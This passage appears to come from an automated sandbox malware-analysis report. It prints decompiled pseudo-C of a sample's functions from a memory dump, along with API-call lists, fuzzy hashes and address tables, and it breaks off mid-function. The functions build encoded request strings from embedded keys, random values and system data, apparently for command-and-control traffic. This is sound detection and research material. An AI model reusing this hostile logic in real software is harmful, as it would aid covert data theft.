                            			E00F1B084(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E00F1B1EF(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E00F1B2A9(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E00F1B194(_t55, _t66);
										_t89 = _t66 + 0x10;
										E00F1B1EF(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E00F1B28B(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}























                            0x00f1b088
                            0x00f1b089
                            0x00f1b08a
                            0x00f1b08d
                            0x00f1b08f
                            0x00f1b092
                            0x00f1b093
                            0x00f1b095
                            0x00f1b096
                            0x00f1b097
                            0x00f1b09a
                            0x00f1b0a4
                            0x00f1b155
                            0x00f1b15c
                            0x00f1b165
                            0x00f1b0aa
                            0x00f1b0aa
                            0x00f1b0b0
                            0x00f1b0b6
                            0x00f1b0b9
                            0x00f1b0bc
                            0x00f1b0c0
                            0x00f1b0c5
                            0x00f1b0ca
                            0x00f1b14a
                            0x00000000
                            0x00f1b0cc
                            0x00f1b0cc
                            0x00f1b0d8
                            0x00f1b0da
                            0x00f1b135
                            0x00f1b135
                            0x00f1b13b
                            0x00000000
                            0x00f1b0dc
                            0x00f1b0eb
                            0x00f1b0ed
                            0x00f1b0ee
                            0x00f1b0ef
                            0x00f1b0f2
                            0x00f1b0f2
                            0x00f1b0f4
                            0x00000000
                            0x00f1b0f6
                            0x00f1b0f6
                            0x00f1b140
                            0x00f1b0f8
                            0x00f1b0f8
                            0x00f1b0fc
                            0x00f1b104
                            0x00f1b109
                            0x00f1b10e
                            0x00f1b11a
                            0x00f1b122
                            0x00f1b129
                            0x00f1b12f
                            0x00f1b133
                            0x00000000
                            0x00f1b133
                            0x00f1b0f6
                            0x00f1b0f4
                            0x00000000
                            0x00f1b0da
                            0x00f1b14e
                            0x00f1b14e
                            0x00f1b14e
                            0x00f1b0ca
                            0x00f1b16a
                            0x00f1b171

                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                            • Instruction ID: d1dd72fc5aba69997512db02e6cab8eeb29679578801f8e4a16faaf978628ebc
                            • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                            • Instruction Fuzzy Hash: E621D632900204EBCB14EF68CCD49ABB7A5FF48320B068068ED199B245E730F955DBE0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F17132, Relevance: 33.2, APIs: 22, Instructions: 244memorystringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 74%
                            			E00F17132(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t67;
				intOrPtr _t68;
				int _t71;
				void* _t72;
				void* _t73;
				void* _t75;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr* _t88;
				void* _t94;
				intOrPtr _t100;
				signed int _t104;
				char** _t106;
				int _t109;
				intOrPtr* _t112;
				intOrPtr* _t114;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr _t121;
				intOrPtr _t126;
				int _t130;
				CHAR* _t132;
				intOrPtr _t133;
				void* _t134;
				void* _t143;
				int _t144;
				void* _t145;
				intOrPtr _t146;
				void* _t148;
				long _t152;
				intOrPtr* _t153;
				intOrPtr* _t154;
				intOrPtr* _t157;
				void* _t158;
				void* _t160;

				_t143 = __edx;
				_t134 = __ecx;
				_t59 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t59 = GetTickCount();
				}
				_t60 =  *0xf1d018; // 0xad359284
				asm("bswap eax");
				_t61 =  *0xf1d014; // 0x3a87c8cd
				_t132 = _a16;
				asm("bswap eax");
				_t62 =  *0xf1d010; // 0xd8d2f808
				asm("bswap eax");
				_t63 =  *0xf1d00c; // 0x8f8f86c2
				asm("bswap eax");
				_t64 =  *0xf1d2b8; // 0x48da5a8
				_t144 = wsprintfA(_t132, _t64 + 0xf1e633, 3, 0x3f87e, _t63, _t62, _t61, _t60,  *0xf1d02c,  *0xf1d004, _t59);
				_t67 = E00F18DA6();
				_t68 =  *0xf1d2b8; // 0x48da5a8
				_t71 = wsprintfA(_t144 + _t132, _t68 + 0xf1e673, _t67);
				_t160 = _t158 + 0x38;
				_t145 = _t144 + _t71;
				_t72 = E00F140AC(_t134);
				_t133 = __imp__;
				_v8 = _t72;
				if(_t72 != 0) {
					_t126 =  *0xf1d2b8; // 0x48da5a8
					_t130 = wsprintfA(_a16 + _t145, _t126 + 0xf1e8b2, _t72);
					_t160 = _t160 + 0xc;
					_t145 = _t145 + _t130;
					HeapFree( *0xf1d270, 0, _v8);
				}
				_t73 = E00F18941();
				_v8 = _t73;
				if(_t73 != 0) {
					_t121 =  *0xf1d2b8; // 0x48da5a8
					wsprintfA(_t145 + _a16, _t121 + 0xf1e885, _t73);
					_t160 = _t160 + 0xc;
					HeapFree( *0xf1d270, 0, _v8);
				}
				_t146 =  *0xf1d35c; // 0x57f95b0
				_t75 = E00F13FB8(0xf1d00a, _t146 + 4);
				_t152 = 0;
				_v20 = _t75;
				if(_t75 == 0) {
					L26:
					HeapFree( *0xf1d270, _t152, _a16);
					return _v12;
				} else {
					_t78 = RtlAllocateHeap( *0xf1d270, 0, 0x800);
					_v8 = _t78;
					if(_t78 == 0) {
						L25:
						HeapFree( *0xf1d270, _t152, _v20);
						goto L26;
					}
					E00F147EF(GetTickCount());
					_t82 =  *0xf1d35c; // 0x57f95b0
					__imp__(_t82 + 0x40);
					asm("lock xadd [eax], ecx");
					_t86 =  *0xf1d35c; // 0x57f95b0
					__imp__(_t86 + 0x40);
					_t88 =  *0xf1d35c; // 0x57f95b0
					_t148 = E00F1A7FB(1, _t143, _a16,  *_t88);
					_v28 = _t148;
					asm("lock xadd [eax], ecx");
					if(_t148 == 0) {
						L24:
						HeapFree( *0xf1d270, _t152, _v8);
						goto L25;
					}
					StrTrimA(_t148, 0xf1c2ac);
					_push(_t148);
					_t94 = E00F16F6D();
					_v16 = _t94;
					if(_t94 == 0) {
						L23:
						HeapFree( *0xf1d270, _t152, _t148);
						goto L24;
					}
					_t153 = __imp__;
					 *_t153(_t148, _a4);
					 *_t153(_v8, _v20);
					_t154 = __imp__;
					 *_t154(_v8, _v16);
					_t100 = E00F165F6( *_t154(_v8, _t148), _v8);
					_a4 = _t100;
					if(_t100 == 0) {
						_v12 = 8;
						L21:
						E00F155F1();
						L22:
						HeapFree( *0xf1d270, 0, _v16);
						_t152 = 0;
						goto L23;
					}
					_t104 = E00F17681(_t133, 0xffffffffffffffff, _t148,  &_v24);
					_v12 = _t104;
					if(_t104 == 0) {
						_t157 = _v24;
						_v12 = E00F142E6(_t157, _a4, _a8, _a12);
						_t112 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
						_t114 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t114 + 8))(_t114);
						_t116 =  *((intOrPtr*)(_t157 + 4));
						 *((intOrPtr*)( *_t116 + 8))(_t116);
						_t118 =  *_t157;
						 *((intOrPtr*)( *_t118 + 8))(_t118);
						E00F16DFA(_t157);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t106 = _a8;
							if(_t106 != 0) {
								_t149 =  *_t106;
								_t155 =  *_a12;
								wcstombs( *_t106,  *_t106,  *_a12);
								_t109 = E00F12F36(_t149, _t149, _t155 >> 1);
								_t148 = _v28;
								 *_a12 = _t109;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E00F16DFA(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}





















































                            0x00f17132
                            0x00f17132
                            0x00f17132
                            0x00f1713d
                            0x00f17144
                            0x00f17146
                            0x00f17146
                            0x00f17153
                            0x00f1715e
                            0x00f17161
                            0x00f17166
                            0x00f1716f
                            0x00f17172
                            0x00f17177
                            0x00f1717a
                            0x00f1717f
                            0x00f17182
                            0x00f1719b
                            0x00f1719d
                            0x00f171a3
                            0x00f171b3
                            0x00f171b5
                            0x00f171b8
                            0x00f171ba
                            0x00f171c1
                            0x00f171c7
                            0x00f171ca
                            0x00f171cd
                            0x00f171df
                            0x00f171e1
                            0x00f171e7
                            0x00f171f1
                            0x00f171f1
                            0x00f171f3
                            0x00f171fa
                            0x00f171fd
                            0x00f17200
                            0x00f17212
                            0x00f17214
                            0x00f17222
                            0x00f17222
                            0x00f17224
                            0x00f17232
                            0x00f17237
                            0x00f1723b
                            0x00f1723e
                            0x00f173ff
                            0x00f17409
                            0x00f17412
                            0x00f17244
                            0x00f17250
                            0x00f17258
                            0x00f1725b
                            0x00f173f3
                            0x00f173fd
                            0x00000000
                            0x00f173fd
                            0x00f17267
                            0x00f1726c
                            0x00f17275
                            0x00f17286
                            0x00f1728a
                            0x00f17293
                            0x00f17299
                            0x00f172a8
                            0x00f172af
                            0x00f172b8
                            0x00f172be
                            0x00f173e7
                            0x00f173f1
                            0x00000000
                            0x00f173f1
                            0x00f172ca
                            0x00f172d0
                            0x00f172d1
                            0x00f172d8
                            0x00f172db
                            0x00f173dd
                            0x00f173e5
                            0x00000000
                            0x00f173e5
                            0x00f172e4
                            0x00f172eb
                            0x00f172f3
                            0x00f172f8
                            0x00f17301
                            0x00f1730c
                            0x00f17313
                            0x00f17316
                            0x00f17415
                            0x00f173c9
                            0x00f173c9
                            0x00f173ce
                            0x00f173d9
                            0x00f173db
                            0x00000000
                            0x00f173db
                            0x00f17320
                            0x00f17327
                            0x00f1732a
                            0x00f1732f
                            0x00f1733f
                            0x00f17342
                            0x00f17348
                            0x00f1734e
                            0x00f17354
                            0x00f17357
                            0x00f1735d
                            0x00f17360
                            0x00f17365
                            0x00f17369
                            0x00f17369
                            0x00f17375
                            0x00f17381
                            0x00f17385
                            0x00f17387
                            0x00f1738c
                            0x00f1738e
                            0x00f17393
                            0x00f17398
                            0x00f173a5
                            0x00f173ad
                            0x00f173b0
                            0x00f173b0
                            0x00f1738c
                            0x00000000
                            0x00f17377
                            0x00f1737b
                            0x00f173b2
                            0x00f173b5
                            0x00f173be
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00f173be
                            0x00f1737d
                            0x00000000
                            0x00f1737d
                            0x00f17375

                            APIs
                            • GetTickCount.KERNEL32 ref: 00F17146
                            • wsprintfA.USER32 ref: 00F17196
                            • wsprintfA.USER32 ref: 00F171B3
                            • wsprintfA.USER32 ref: 00F171DF
                            • HeapFree.KERNEL32(00000000,?), ref: 00F171F1
                            • wsprintfA.USER32 ref: 00F17212
                            • HeapFree.KERNEL32(00000000,?), ref: 00F17222
                            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00F17250
                            • GetTickCount.KERNEL32 ref: 00F17261
                            • RtlEnterCriticalSection.NTDLL(057F9570), ref: 00F17275
                            • RtlLeaveCriticalSection.NTDLL(057F9570), ref: 00F17293
                              • Part of subcall function 00F1A7FB: lstrlen.KERNEL32(00000000,?,00000000,00000000,?,?,75145520,00F164DC,?,057F95B0), ref: 00F1A826
                              • Part of subcall function 00F1A7FB: lstrlen.KERNEL32(?,?,75145520,00F164DC,?,057F95B0), ref: 00F1A82E
                              • Part of subcall function 00F1A7FB: strcpy.NTDLL ref: 00F1A845
                              • Part of subcall function 00F1A7FB: lstrcat.KERNEL32(00000000,?), ref: 00F1A850
                              • Part of subcall function 00F1A7FB: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00F164DC,?,75145520,00F164DC,?,057F95B0), ref: 00F1A86D
                            • StrTrimA.SHLWAPI(00000000,00F1C2AC,?,057F95B0), ref: 00F172CA
                              • Part of subcall function 00F16F6D: lstrlen.KERNEL32(057F9B58,00000000,00000000,?,00F16507,00000000), ref: 00F16F7D
                              • Part of subcall function 00F16F6D: lstrlen.KERNEL32(?), ref: 00F16F85
                              • Part of subcall function 00F16F6D: lstrcpy.KERNEL32(00000000,057F9B58), ref: 00F16F99
                              • Part of subcall function 00F16F6D: lstrcat.KERNEL32(00000000,?), ref: 00F16FA4
                            • lstrcpy.KERNEL32(00000000,?), ref: 00F172EB
                            • lstrcpy.KERNEL32(?,?), ref: 00F172F3
                            • lstrcat.KERNEL32(?,?), ref: 00F17301
                            • lstrcat.KERNEL32(?,00000000), ref: 00F17307
                              • Part of subcall function 00F165F6: lstrlen.KERNEL32(?,00000000,057F9B78,00000000,00F125B8,?,69B25F44,?,?,?,?,69B25F44,00000005,00F1D00C,?,?), ref: 00F165FD
                              • Part of subcall function 00F165F6: mbstowcs.NTDLL ref: 00F16626
                              • Part of subcall function 00F165F6: memset.NTDLL ref: 00F16638
                            • wcstombs.NTDLL ref: 00F17398
                              • Part of subcall function 00F142E6: SysAllocString.OLEAUT32(?), ref: 00F14327
                              • Part of subcall function 00F16DFA: RtlFreeHeap.NTDLL(00000000,00000000,00F155CD,00000000,?,?,00000000), ref: 00F16E06
                            • HeapFree.KERNEL32(00000000,?,?), ref: 00F173D9
                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00F173E5
                            • HeapFree.KERNEL32(00000000,?,?,057F95B0), ref: 00F173F1
                            • HeapFree.KERNEL32(00000000,?), ref: 00F173FD
                            • HeapFree.KERNEL32(00000000,?), ref: 00F17409
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                            • String ID:
                            • API String ID: 3748877296-0
                            • Opcode ID: 6deadb74dab056ef075a08d5bdc437da6550e62397a2a6ce2b7a7e6b844c7991
                            • Instruction ID: 795c1b9e9693b48392c349f0d9bec823a25010bbd74ce5c9dc09361a7b7bf55f
                            • Opcode Fuzzy Hash: 6deadb74dab056ef075a08d5bdc437da6550e62397a2a6ce2b7a7e6b844c7991
                            • Instruction Fuzzy Hash: BA913871900218EFCB11EFA4DC84AEA7BB9FF48354F168055F818E7260DB35D991EBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F15D44, Relevance: 16.6, APIs: 11, Instructions: 145stringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 55%
                            			E00F15D44(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR** _a16, WCHAR** _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				WCHAR* _v24;
				signed int _v28;
				intOrPtr _v32;
				void* __edi;
				void* __esi;
				WCHAR* _t58;
				signed int _t60;
				signed int _t62;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr _t70;
				void* _t72;
				void* _t75;
				void* _t76;
				WCHAR* _t80;
				WCHAR* _t83;
				void* _t84;
				void* _t85;
				void* _t86;
				intOrPtr _t92;
				signed int _t103;
				void* _t104;
				intOrPtr _t105;
				void* _t107;
				intOrPtr* _t115;
				void* _t119;
				WCHAR* _t125;

				_t58 =  *0xf1d36c; // 0x57f9818
				_v24 = _t58;
				_v28 = 8;
				_v20 = GetTickCount();
				_t60 = E00F167ED();
				_t103 = 5;
				_t98 = _t60 % _t103 + 6;
				_t62 = E00F167ED();
				_t117 = _t62 % _t103 + 6;
				_v32 = _t62 % _t103 + 6;
				_t64 = E00F13C00(_t60 % _t103 + 6);
				_v16 = _t64;
				if(_t64 != 0) {
					_t66 = E00F13C00(_t117);
					_v12 = _t66;
					if(_t66 != 0) {
						_push(5);
						_t104 = 0xa;
						_t119 = E00F1A725(_t104,  &_v20);
						if(_t119 == 0) {
							_t119 = 0xf1c1ac;
						}
						_t70 = E00F14FFE(_v24);
						_v8 = _t70;
						if(_t70 != 0) {
							_t115 = __imp__;
							_t72 =  *_t115(_t119);
							_t75 =  *_t115(_v8);
							_t76 =  *_t115(_a4);
							_t80 = E00F155DC(lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76 + lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76);
							_v24 = _t80;
							if(_t80 != 0) {
								_t105 =  *0xf1d2b8; // 0x48da5a8
								wsprintfW(_t80, _t105 + 0xf1eae8, _t119, _t119, _v16, _v12, _v12, _v16, _a4, _v8, _a8);
								_push(4);
								_t107 = 5;
								_t83 = E00F1A725(_t107,  &_v20);
								_a8 = _t83;
								if(_t83 == 0) {
									_a8 = 0xf1c1b0;
								}
								_t84 =  *_t115(_a8);
								_t85 =  *_t115(_v8);
								_t86 =  *_t115(_a4);
								_t125 = E00F155DC(lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + 0x13a);
								if(_t125 == 0) {
									E00F16DFA(_v24);
								} else {
									_t92 =  *0xf1d2b8; // 0x48da5a8
									wsprintfW(_t125, _t92 + 0xf1ec60, _a8, _a8, _a4, _v8, _a12);
									 *_a16 = _v24;
									_v28 = _v28 & 0x00000000;
									 *_a20 = _t125;
								}
							}
							E00F16DFA(_v8);
						}
						E00F16DFA(_v12);
					}
					E00F16DFA(_v16);
				}
				return _v28;
			}


































                            0x00f15d4a
                            0x00f15d52
                            0x00f15d55
                            0x00f15d62
                            0x00f15d65
                            0x00f15d6c
                            0x00f15d73
                            0x00f15d76
                            0x00f15d83
                            0x00f15d86
                            0x00f15d89
                            0x00f15d90
                            0x00f15d93
                            0x00f15d9b
                            0x00f15da2
                            0x00f15da5
                            0x00f15dab
                            0x00f15daf
                            0x00f15db8
                            0x00f15dbc
                            0x00f15dbe
                            0x00f15dbe
                            0x00f15dc6
                            0x00f15dcd
                            0x00f15dd0
                            0x00f15dd6
                            0x00f15ddd
                            0x00f15dee
                            0x00f15df5
                            0x00f15e07
                            0x00f15e0e
                            0x00f15e11
                            0x00f15e1a
                            0x00f15e42
                            0x00f15e47
                            0x00f15e4b
                            0x00f15e4f
                            0x00f15e56
                            0x00f15e59
                            0x00f15e5b
                            0x00f15e5b
                            0x00f15e65
                            0x00f15e6e
                            0x00f15e75
                            0x00f15e91
                            0x00f15e95
                            0x00f15ece
                            0x00f15e97
                            0x00f15e9a
                            0x00f15eb3
                            0x00f15ebb
                            0x00f15ec3
                            0x00f15ec7
                            0x00f15ec7
                            0x00f15e95
                            0x00f15ed6
                            0x00f15ed6
                            0x00f15ede
                            0x00f15ede
                            0x00f15ee6
                            0x00f15ee6
                            0x00f15ef2

                            APIs
                            • GetTickCount.KERNEL32 ref: 00F15D5C
                            • lstrlen.KERNEL32(00000000,00000005), ref: 00F15DDD
                            • lstrlen.KERNEL32(?), ref: 00F15DEE
                            • lstrlen.KERNEL32(00000000), ref: 00F15DF5
                            • lstrlenW.KERNEL32(80000002), ref: 00F15DFC
                            • wsprintfW.USER32 ref: 00F15E42
                            • lstrlen.KERNEL32(?,00000004), ref: 00F15E65
                            • lstrlen.KERNEL32(?), ref: 00F15E6E
                            • lstrlen.KERNEL32(?), ref: 00F15E75
                            • lstrlenW.KERNEL32(?), ref: 00F15E7C
                            • wsprintfW.USER32 ref: 00F15EB3
                              • Part of subcall function 00F16DFA: RtlFreeHeap.NTDLL(00000000,00000000,00F155CD,00000000,?,?,00000000), ref: 00F16E06
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: lstrlen$wsprintf$CountFreeHeapTick
                            • String ID:
                            • API String ID: 822878831-0
                            • Opcode ID: c12a590b09e287eb38710e2ee1d872516c2e310884795632b513ea56a3da2182
                            • Instruction ID: 23c793f59ec69dd802319da42224c2e2f50ca9b47a14373a72caea0e0989791c
                            • Opcode Fuzzy Hash: c12a590b09e287eb38710e2ee1d872516c2e310884795632b513ea56a3da2182
                            • Instruction Fuzzy Hash: EC518B32D00219EFCF11AFA4DC45ADE7BB6EF48314F158065F908A7261DB398A51EFA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F1A7FB, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 63%
                            			E00F1A7FB(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0xf1d2b8; // 0x48da5a8
				_t36 = 0;
				_t28 = E00F12262(__ecx, _t9 + 0xf1e62c);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t6 =  *_t40(_a4) + 1; // 0x57f95b1
					_t41 = E00F155DC(_v8 + _t6);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E00F166FF(_t34, _t41, _a8);
						E00F16DFA(_t41);
						_t42 = E00F14024(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E00F16DFA(_t36);
							_t36 = _t42;
						}
						_t43 = E00F1484D(_t36, _t33);
						if(_t43 != 0) {
							E00F16DFA(_t36);
							_t36 = _t43;
						}
					}
					E00F16DFA(_t28);
				}
				return _t36;
			}














                            0x00f1a7fb
                            0x00f1a7fe
                            0x00f1a7ff
                            0x00f1a80e
                            0x00f1a815
                            0x00f1a819
                            0x00f1a81f
                            0x00f1a826
                            0x00f1a82b
                            0x00f1a833
                            0x00f1a83d
                            0x00f1a841
                            0x00f1a845
                            0x00f1a84b
                            0x00f1a850
                            0x00f1a860
                            0x00f1a862
                            0x00f1a879
                            0x00f1a87d
                            0x00f1a880
                            0x00f1a885
                            0x00f1a885
                            0x00f1a88e
                            0x00f1a892
                            0x00f1a895
                            0x00f1a89a
                            0x00f1a89a
                            0x00f1a892
                            0x00f1a89d
                            0x00f1a89d
                            0x00f1a8a8

                            APIs
                              • Part of subcall function 00F12262: lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,00F1A815,?,00000000,00000000,?,?,75145520,00F164DC), ref: 00F122C9
                              • Part of subcall function 00F12262: sprintf.NTDLL ref: 00F122EA
                            • lstrlen.KERNEL32(00000000,?,00000000,00000000,?,?,75145520,00F164DC,?,057F95B0), ref: 00F1A826
                            • lstrlen.KERNEL32(?,?,75145520,00F164DC,?,057F95B0), ref: 00F1A82E
                              • Part of subcall function 00F155DC: RtlAllocateHeap.NTDLL(00000000,00000000,00F1552C), ref: 00F155E8
                            • strcpy.NTDLL ref: 00F1A845
                            • lstrcat.KERNEL32(00000000,?), ref: 00F1A850
                              • Part of subcall function 00F166FF: lstrlen.KERNEL32(?,?,00F164DC,00F164DC,00000001,00000000,00000000,?,00F1A85F,00000000,00F164DC,?,75145520,00F164DC,?,057F95B0), ref: 00F16716
                              • Part of subcall function 00F16DFA: RtlFreeHeap.NTDLL(00000000,00000000,00F155CD,00000000,?,?,00000000), ref: 00F16E06
                            • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00F164DC,?,75145520,00F164DC,?,057F95B0), ref: 00F1A86D
                              • Part of subcall function 00F14024: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,00F1A879,00000000,?,75145520,00F164DC,?,057F95B0), ref: 00F1402E
                              • Part of subcall function 00F14024: _snprintf.NTDLL ref: 00F1408C
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                            • String ID: =
                            • API String ID: 2864389247-1428090586
                            • Opcode ID: fd7e415f842538f457ae93d47e5f8bfc09eb0eacd1441bcb52c768d2b9480301
                            • Instruction ID: f73dd84f99435ca5113b6e6a826ee0f25e309b03df9b0bee467254d535c98695
                            • Opcode Fuzzy Hash: fd7e415f842538f457ae93d47e5f8bfc09eb0eacd1441bcb52c768d2b9480301
                            • Instruction Fuzzy Hash: 4B11C633A01229BB861277B89C45CEF3BAD9E897743094165F905D7101DE78DD8377E2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F1A90C, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145stringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 22%
                            			E00F1A90C(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E00F155DC(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E00F16DFA(_v16);
								goto L37;
							}
